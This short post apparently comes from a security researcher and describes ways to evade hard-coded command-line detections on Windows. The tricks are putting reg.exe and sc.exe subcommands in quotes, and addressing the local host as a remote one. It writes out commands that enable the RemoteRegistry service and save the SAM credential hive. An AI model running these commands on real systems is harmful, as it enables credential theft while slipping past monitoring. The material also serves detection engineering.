Many Windows tools support commands f.ex.:

• reg.exe – QUERY, ADD, DELETE, COPY, SAVE, RESTORE, LOAD, UNLOAD, COMPARE, EXPORT, IMPORT, FLAGS
• sc.exe – config, continue, control, create, delete, description, EnumDepend, failure, failureflag, GetDisplayName, GetKeyName, interrogate, managedaccount, pause, preferrednode, privs, qc, qdescription, qfailure, qfailureflag, qmanagedaccount, qpreferrednode, qprivs, qprotection, qsidtype, qtriggerinfo, query, queryex, quserservice, sdset, sdshow, showsid, sidtype, start, stop, triggerinfo
• netsh.exe – ?, add, advfirewall, branchcache, bridge, delete, dhcpclient, dnsclient, dump, exec, firewall, help, http, interface, ipsec, lan, mbn, namespace, netio, p2p, ras, rpc, set, show, trace, wcn, wfp, winhttp, winsock, wlan
• fsutil.exe – 8dot3name, behavior, dax, dirty, file, fsInfo, hardlink, objectID, quota, repair, reparsePoint, resource, sparse, storageReserve, tiering, transaction, usn, volume, wim

We are very used to their invocations in a form of tool command but there is an alternative way to invoke them by using quotes around these commands f.ex.:

• reg.exe “query” is identical with reg.exe query
• sc.exe “start” is identical with sc start
• etc.

This breaks many hard-coded detections.

The second secret is the omnipresent support for everything ‘remote’, that is – operations that can be executed on other endpoints.

As such, one can use computer names in many of these commands, f.ex. we can prefix registry keys for reg.exe command with host names. And this includes localhost, 127.0.0.1, ::1 – yet notably, for these to work the RemoteRegistry service needs to be running on a local host. It’s actually very easy to do so:

sc config remoteregistry start= auto
sc start remoteregistry

and then we can easily run one of these:

reg save \\127.0.0.1\hklm\sam sam
reg save \\localhost\hklm\sam sam
reg save \\::1\hklm\sam sam
reg "save" \\127.0.0.1\hklm\sam sam
reg "save" \\localhost\hklm\sam sam
reg "save" \\::1\hklm\sam sam

This will break many detections too.